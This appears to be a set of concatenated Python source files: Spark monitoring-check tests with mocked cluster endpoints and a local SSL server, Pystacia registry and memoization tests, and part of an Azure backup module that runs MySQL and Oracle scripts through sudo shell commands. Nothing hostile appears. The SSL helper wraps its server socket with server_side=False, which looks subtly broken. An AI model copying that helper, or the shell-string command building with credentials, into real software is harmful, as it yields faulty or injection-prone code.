'spark.job.num_failed_tasks': 60,
'spark.job.num_active_stages': 70,
'spark.job.num_completed_stages': 80,
'spark.job.num_skipped_stages': 90,
'spark.job.num_failed_stages': 100
}
SPARK_JOB_RUNNING_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:running',
]
SPARK_JOB_SUCCEEDED_METRIC_VALUES = {
'spark.job.count': 3,
'spark.job.num_tasks': 1000,
'spark.job.num_active_tasks': 2000,
'spark.job.num_completed_tasks': 3000,
'spark.job.num_skipped_tasks': 4000,
'spark.job.num_failed_tasks': 5000,
'spark.job.num_active_stages': 6000,
'spark.job.num_completed_stages': 7000,
'spark.job.num_skipped_stages': 8000,
'spark.job.num_failed_stages': 9000
}
SPARK_JOB_SUCCEEDED_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:succeeded',
]
SPARK_STAGE_RUNNING_METRIC_VALUES = {
'spark.stage.count': 3,
'spark.stage.num_active_tasks': 3*3,
'spark.stage.num_complete_tasks': 4*3,
'spark.stage.num_failed_tasks': 5*3,
'spark.stage.executor_run_time': 6*3,
'spark.stage.input_bytes': 7*3,
'spark.stage.input_records': 8*3,
'spark.stage.output_bytes': 9*3,
'spark.stage.output_records': 10*3,
'spark.stage.shuffle_read_bytes': 11*3,
'spark.stage.shuffle_read_records': 12*3,
'spark.stage.shuffle_write_bytes': 13*3,
'spark.stage.shuffle_write_records': 14*3,
'spark.stage.memory_bytes_spilled': 15*3,
'spark.stage.disk_bytes_spilled': 16*3,
}
SPARK_STAGE_RUNNING_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:running',
]
SPARK_STAGE_COMPLETE_METRIC_VALUES = {
'spark.stage.count': 2,
'spark.stage.num_active_tasks': 100*2,
'spark.stage.num_complete_tasks': 101*2,
'spark.stage.num_failed_tasks': 102*2,
'spark.stage.executor_run_time': 103*2,
'spark.stage.input_bytes': 104*2,
'spark.stage.input_records': 105*2,
'spark.stage.output_bytes': 106*2,
'spark.stage.output_records': 107*2,
'spark.stage.shuffle_read_bytes': 108*2,
'spark.stage.shuffle_read_records': 109*2,
'spark.stage.shuffle_write_bytes': 110*2,
'spark.stage.shuffle_write_records': 111*2,
'spark.stage.memory_bytes_spilled': 112*2,
'spark.stage.disk_bytes_spilled': 113*2,
}
SPARK_STAGE_COMPLETE_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME,
'status:complete',
]
SPARK_DRIVER_METRIC_VALUES = {
'spark.driver.rdd_blocks': 99,
'spark.driver.memory_used': 98,
'spark.driver.disk_used': 97,
'spark.driver.active_tasks': 96,
'spark.driver.failed_tasks': 95,
'spark.driver.completed_tasks': 94,
'spark.driver.total_tasks': 93,
'spark.driver.total_duration': 92,
'spark.driver.total_input_bytes': 91,
'spark.driver.total_shuffle_read': 90,
'spark.driver.total_shuffle_write': 89,
'spark.driver.max_memory': 278019440,
}
SPARK_EXECUTOR_METRIC_VALUES = {
'spark.executor.count': 2,
'spark.executor.rdd_blocks': 1,
'spark.executor.memory_used': 2,
'spark.executor.disk_used': 3,
'spark.executor.active_tasks': 4,
'spark.executor.failed_tasks': 5,
'spark.executor.completed_tasks': 6,
'spark.executor.total_tasks': 7,
'spark.executor.total_duration': 8,
'spark.executor.total_input_bytes': 9,
'spark.executor.total_shuffle_read': 10,
'spark.executor.total_shuffle_write': 11,
'spark.executor.max_memory': 555755765,
}
SPARK_RDD_METRIC_VALUES = {
'spark.rdd.count': 1,
'spark.rdd.num_partitions': 2,
'spark.rdd.num_cached_partitions': 2,
'spark.rdd.memory_used': 284,
'spark.rdd.disk_used': 0,
}
SPARK_STREAMING_STATISTICS_METRIC_VALUES = {
'spark.streaming.statistics.avg_input_rate': 1.0,
'spark.streaming.statistics.avg_processing_time': 175,
'spark.streaming.statistics.avg_scheduling_delay': 8,
'spark.streaming.statistics.avg_total_delay': 183,
'spark.streaming.statistics.batch_duration': 2000,
'spark.streaming.statistics.num_active_batches': 2,
'spark.streaming.statistics.num_active_receivers': 1,
'spark.streaming.statistics.num_inactive_receivers': 3,
'spark.streaming.statistics.num_processed_records': 7,
'spark.streaming.statistics.num_received_records': 9,
'spark.streaming.statistics.num_receivers': 10,
'spark.streaming.statistics.num_retained_completed_batches': 27,
'spark.streaming.statistics.num_total_completed_batches': 28,
}
SPARK_METRIC_TAGS = [
'cluster_name:' + CLUSTER_NAME,
'app_name:' + APP_NAME
]
def test_yarn(aggregator):
with mock.patch('requests.get', yarn_requests_get_mock):
c = SparkCheck('spark', None, {}, [YARN_CONFIG])
c.check(YARN_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS, value=value)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
tags = ['url:http://localhost:8088', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_auth_yarn(aggregator):
with mock.patch('requests.get', yarn_requests_auth_mock):
c = SparkCheck('spark', None, {}, [YARN_AUTH_CONFIG])
c.check(YARN_AUTH_CONFIG)
tags = ['url:http://localhost:8088', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
for sc in aggregator.service_checks(YARN_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
sc.tags.sort()
assert sc.tags == tags
def test_mesos(aggregator):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', None, {}, [MESOS_CONFIG])
c.check(MESOS_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS + CUSTOM_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS + CUSTOM_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS + CUSTOM_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS + CUSTOM_TAGS)
# Check the service tests
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:5050', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
tags = ['url:http://localhost:4040', 'cluster_name:SparkCluster'] + CUSTOM_TAGS
tags.sort()
sc.tags.sort()
assert sc.tags == tags
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_mesos_filter(aggregator):
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', None, {}, [MESOS_FILTERED_CONFIG])
c.check(MESOS_FILTERED_CONFIG)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:5050', 'cluster_name:SparkCluster']
assert aggregator.metrics_asserted_pct == 100.0
def test_standalone(aggregator):
with mock.patch('requests.get', standalone_requests_get_mock):
c = SparkCheck('spark', None, {}, [STANDALONE_CONFIG])
c.check(STANDALONE_CONFIG)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080', 'cluster_name:SparkCluster']
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040', 'cluster_name:SparkCluster']
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_standalone_pre20(aggregator):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck('spark', None, {}, [STANDALONE_CONFIG_PRE_20])
c.check(STANDALONE_CONFIG_PRE_20)
# Check the running job metrics
for metric, value in SPARK_JOB_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in SPARK_JOB_SUCCEEDED_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in SPARK_STAGE_RUNNING_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in SPARK_STAGE_COMPLETE_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in SPARK_DRIVER_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the executor metrics
for metric, value in SPARK_EXECUTOR_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the RDD metrics
for metric, value in SPARK_RDD_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the streaming statistics metrics
for metric, value in SPARK_STREAMING_STATISTICS_METRIC_VALUES.iteritems():
aggregator.assert_metric(
metric,
value=value,
tags=SPARK_METRIC_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080', 'cluster_name:SparkCluster']
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040', 'cluster_name:SparkCluster']
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
def test_ssl():
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_CONFIG])
with pytest.raises(requests.exceptions.SSLError):
c.check(SSL_CONFIG)
def test_ssl_no_verify():
# Disable ssl warning for self signed cert/no verify
requests.packages.urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_NO_VERIFY_CONFIG])
c.check(SSL_NO_VERIFY_CONFIG)
def test_ssl_cert():
# Disable ssl warning for self signed cert/no verify
requests.packages.urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', None, {}, [SSL_CERT_CONFIG])
c.check(SSL_CERT_CONFIG)
class StandaloneAppsResponseHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'r') as f:
self.wfile.write(f.read())
def run_ssl_server():
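# Sketch of this helper's behavior, for reference: it spins up a one-shot HTTPS
# server using the self-signed server.pem certificate, answers a single request
# in a background thread (5 s timeout), and returns the server object. The SSL
# tests above call it once per check run.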
cert_file = os.path.join(CERTIFICATE_DIR, 'server.pem')
httpd = BaseHTTPServer.HTTPServer((SSL_SERVER_ADDRESS, SSL_SERVER_PORT), StandaloneAppsResponseHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert_file, server_side=False)
httpd.timeout = 5
threading.Thread(target=httpd.handle_request).start()
time.sleep(.5)
return httpd
|
util_tests.py
|
# coding: utf-8
# pystacia/tests/util_tests.py
# Copyright (C) 2011 by Paweł Piotr Przeradowski
#
# This module is part of Pystacia and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
import math
from time import sleep
from random import randint, choice, sample
from threading import Thread
from pystacia.tests.common import TestCase, skipIf
class RegistryTest(TestCase):
def setUp(self):
self.registry = Registry()
def test_simple(self):
registry = self.registry
registry.value = 2
self.assertEqual(registry.value, 2)
self.assertTrue(hasattr(registry, 'value'))
self.assertEqual(registry.get('value', 3), 2)
self.assertEqual(registry.get('value', 3, 3), 3)
del registry.value
self.assertFalse(hasattr(registry, 'value'))
self.assertEqual(registry.get('value', 3), 3)
self.assertEqual(registry.get('value', 3, 2), 2)
self.assertRaises(AttributeError, lambda: registry.value)
def test_defaults(self):
registry = self.registry
registry._install_default('value', 4)
self.assertEqual(registry.value, 4)
registry.value = 5
self.assertEqual(registry.value, 5)
del registry.value
self.assertEqual(registry.value, 4)
def test_lock(self):
registry = self.registry
registry.value = 3
registry._lock('value')
self.assertEqual(registry.value, 3)
def assign():
registry.value = 4
self.assertRaisesRegexp(PystaciaException, 'has been locked',
assign)
def delete():
del registry.value
self.assertRaisesRegexp(PystaciaException, 'has been locked',
delete)
def test_threaded(self):
registry = self.registry
for x in range(0, 20):
setattr(registry, 'value_' + str(x), x)
def thread():
sleep(0.01)
for x in sample(range(0, 20), 18):
self.assertEqual(getattr(registry, 'value_' + str(x)), x)
if randint(0, 1):
registry._install_default('value_' + str(x), 2 * x)
threads = [Thread(target=thread) for _ in range(0, 50)]
[t.start() for t in threads[:10]]
for x in range(0, 15):
registry._lock('value_' + str(x))
[t.start() for t in threads[10:]]
for x in range(15, 20):
registry._lock('value_' + str(x))
[t.join() for t in threads]
class MemoizedTest(TestCase):
def test(self):
a = producer()
self.assertEqual(producer(), a)
self.assertEqual(add(1, 2), 3)
self.assertNotEqual(producer(1), a)
def test_threaded(self):
def thread():
for _ in range(randint(0, 20)):
a = randint(0, 100)
b = randint(0, 100)
self.assertEqual(add(a, b), a + b)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
def test_nested(self):
funcs = [add3, add3, add]
def thread():
for _ in range(randint(0, 20)):
func = choice(funcs)
a = randint(0, 100)
b = randint(0, 100)
if func == add:
self.assertEqual(func(a, b), a + b)
elif func == add3:
c = randint(0, 100)
self.assertEqual(func(a, b, c), a + b + c)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
def test_recursive(self):
def thread():
for _ in range(randint(0, 20)):
a = randint(0, 100)
self.assertEqual(recurse(a), a)
threads = [Thread(target=thread) for _ in range(randint(0, 50))]
[t.start() for t in threads]
[t.join() for t in threads]
@skipIf(not hasattr(math, 'factorial'), 'Python without factorial')
def test_threaded_recursive(self):
def thread():
x = randint(1, 7)
self.assertEqual(threaded_factorial(x), math.factorial(x))
threads = [Thread(target=thread) for _ in range(0, 50)]
[t.start() for t in threads]
[t.join() for t in threads]
class A(object):
pass
from pystacia.util import memoized
@memoized
def producer(arg=None):
"""doc"""
return A()
@memoized
def add(a, b):
return a + b
@memoized
def add3(a, b, c):
return add(a, b) + c
@memoized
def recurse(i):
if not i:
return 0
else:
return recurse(i - 1) + 1
class SubThread(Thread):
def __init__(self, i):
self.i = i
super(SubThread, self).__init__()
def run(self):
self.result = threaded_factorial(self.i)
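# Note: threaded_factorial below computes i! by delegating (i - 1)! to a fresh
# SubThread at every level, so the @memoized cache is exercised concurrently
# across threads (see MemoizedTest.test_threaded_recursive above).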
@memoized
def threaded_factorial(i):
if i == 1:
return 1
else:
subthread = SubThread(i - 1)
subthread.start()
subthread.join()
return i * subthread.result
from pystacia.util import Registry, PystaciaException
|
WorkloadPatch.py
|
#!/usr/bin/python
#
# Copyright 2015 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+
import sys
import Utils.HandlerUtil
import threading
import os
from time import sleep
try:
import ConfigParser as ConfigParsers
except ImportError:
import configparser as ConfigParsers
import subprocess
from common import CommonVariables
from workloadPatch.LogBackupPatch import LogBackupPatch
class ErrorDetail:
def __init__(self, errorCode, errorMsg):
self.errorCode = errorCode
self.errorMsg = errorMsg
class WorkloadPatch:
def __init__(self, logger):
self.logger = logger
self.name = None
self.command = ""
self.dbnames = []
self.cred_string = ""
self.ipc_folder = None
self.error_details = []
self.enforce_slave_only = 0
self.role = "master"
self.child = []
self.timeout = 90
self.sudo_user = "sudo"
self.outfile = ""
self.logbackup = ""
self.confParser()
def pre(self):
try:
self.logger.log("WorkloadPatch: Entering workload pre call")
if self.role == "master" and int(self.enforce_slave_only) == 0:
if len(self.dbnames) == 0 :
#pre at server level create fork process for child and append
self.preMaster()
else:
self.preMasterDB()
# create fork process for child
elif self.role == "slave":
if len(self.dbnames) == 0 :
#pre at server level create fork process for child and append
self.preSlave()
else:
self.preSlaveDB()
# create fork process for child
else:
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidRole, "invalid role name in config"))
except Exception as e:
self.logger.log("WorkloadPatch: exception in pre" + str(e))
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadPreError, "Exception in pre"))
def post(self):
try:
self.logger.log("WorkloadPatch: Entering workload post call")
if self.role == "master":
if len(self.dbnames) == 0:
#post at server level to turn off readonly mode
self.postMaster()
else:
self.postMasterDB()
elif self.role == "slave":
if len(self.dbnames) == 0 :
#post at server level to turn on slave
self.postSlave()
else:
self.postSlaveDB()
else:
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidRole, "invalid role name in config"))
except Exception as e:
self.logger.log("WorkloadPatch: exception in post" + str(e))
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadPostError, "exception in processing of postscript"))
def preMaster(self):
self.logger.log("WorkloadPatch: Entering pre mode for master")
if self.ipc_folder != None:
self.outfile = os.path.join(self.ipc_folder, "azbackupIPC.txt")
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at pre")
global preWorkloadStatus
preWorkloadStatus = self.workloadStatus()
if "OPEN" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus is open")
elif "NOT APPLY" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not open.")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Pre- Workload not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for premaster mysql")
if self.outfile == "":
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadIPCDirectoryMissing, "IPC directory missing"))
return None
prescript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/preMysqlMaster.sql")
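# The next line builds, roughly, a shell command of the form (placeholders are
# illustrative; the exact quoting/escaping is what the next line constructs):
#   sudo -u <user> <command_path>mysql <credString> \
#     -e"set @timeout=<timeout>;set @outfile=\"<ipc_folder>/azbackupIPC.txt\";source .../preMysqlMaster.sql;"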
arg = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" -e\"set @timeout="+self.timeout+";set @outfile=\\\"\\\\\\\""+self.outfile+"\\\\\\\"\\\";source "+prescript+";\""
binary_thread = threading.Thread(target=self.thread_for_sql, args=[arg])
binary_thread.start()
self.waitForPreScriptCompletion()
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Pre- Inside oracle pre")
preOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleMaster.sql ")
args = [self.sudo_user, preOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.timeoutDaemon()
self.logger.log("WorkloadPatch: Pre- Exiting pre mode for master")
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def postMaster(self):
self.logger.log("WorkloadPatch: Entering post mode for master")
if self.ipc_folder != None: # IPC-based workloads
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at post")
if len(self.child) == 0 or self.child[0].poll() is not None:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingTimeout,"not app consistent"))
return
elif self.child[0].poll() is None:
self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
else: #non IPC based workloads
if preDaemonThread.isAlive():
self.logger.log("WorkloadPatch: Post- Timeout daemon still in sleep. Terminating ...")
daemonProcess.terminate()
else:
self.logger.log("WorkloadPatch: Post Error- Timeout daemon executed before post")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingTimeout,"not app consistent"))
return
postWorkloadStatus = self.workloadStatus()
if postWorkloadStatus != preWorkloadStatus:
self.logger.log("WorkloadPatch: Pre and post database status different.")
if "OPEN" in str(postWorkloadStatus):
self.logger.log("WorkloadPatch: Post- Workload is open")
elif "NOT APPLY" in str(postWorkloadStatus):
self.logger.log("WorkloadPatch: Post- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Post- Workload is not open")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Post- Workload is not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for post master")
postscript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/postMysqlMaster.sql")
args = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" < "+postscript
self.logger.log("WorkloadPatch: command to execute: "+str(args))
post_child = subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE)
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Post- Inside oracle post")
postOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/postOracleMaster.sql ")
args = [self.sudo_user, postOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll()==None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.logger.log("WorkloadPatch: Post- Completed")
self.callLogBackup()
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def preSlave(self):
self.logger.log("WorkloadPatch: Entering pre mode for sloave")
if self.ipc_folder != None:
self.outfile = os.path.join(self.ipc_folder, "azbackupIPC.txt")
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at pre")
global preWorkloadStatus
preWorkloadStatus = self.workloadStatus()
if "OPEN" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus is open")
elif "NOT APPLY" in str(preWorkloadStatus):
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not apply")
else:
self.logger.log("WorkloadPatch: Pre- WorkloadStatus not open.")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadDatabaseNotOpen, "Pre- Workload not open"))
return None
if 'mysql' in self.name.lower():
self.logger.log("WorkloadPatch: Create connection string for preslave mysql")
if self.outfile == "":
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadIPCDirectoryMissing, "IPC directory missing"))
return None
prescript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/preMysqlSlave.sql")
arg = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" -e\"set @timeout="+self.timeout+";set @outfile=\\\"\\\\\\\""+self.outfile+"\\\\\\\"\\\";source "+prescript+";\""
binary_thread = threading.Thread(target=self.thread_for_sql, args=[arg])
binary_thread.start()
self.waitForPreScriptCompletion()
elif 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Pre- Inside oracle pre")
preOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleMaster.sql ")
args = [self.sudo_user, preOracle]
process = subprocess.Popen(args)
wait_counter = 5
while process.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.timeoutDaemon()
self.logger.log("WorkloadPatch: Pre- Exiting pre mode for slave")
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def postSlave(self):
self.logger.log("WorkloadPatch: Entering post mode for slave")
if self.ipc_folder != None:
if os.path.exists(self.outfile):
os.remove(self.outfile)
else:
self.logger.log("WorkloadPatch: File for IPC does not exist at post")
if len(self.child) == 0:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append("not app consistent")
elif self.child[0].poll() is None:
self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
if 'mysql' in self.name.lower():
if len(self.child) == 0:
self.logger.log("WorkloadPatch: Not app consistent backup")
self.error_details.append("not app consistent")
elif self.child[0].poll() is None:
self.logger.log("WorkloadPatch: pre connection still running. Sending kill signal")
self.child[0].kill()
self.logger.log("WorkloadPatch: Create connection string for post master")
postscript = os.path.join(os.getcwd(), "main/workloadPatch/scripts/postMysqlSlave.sql")
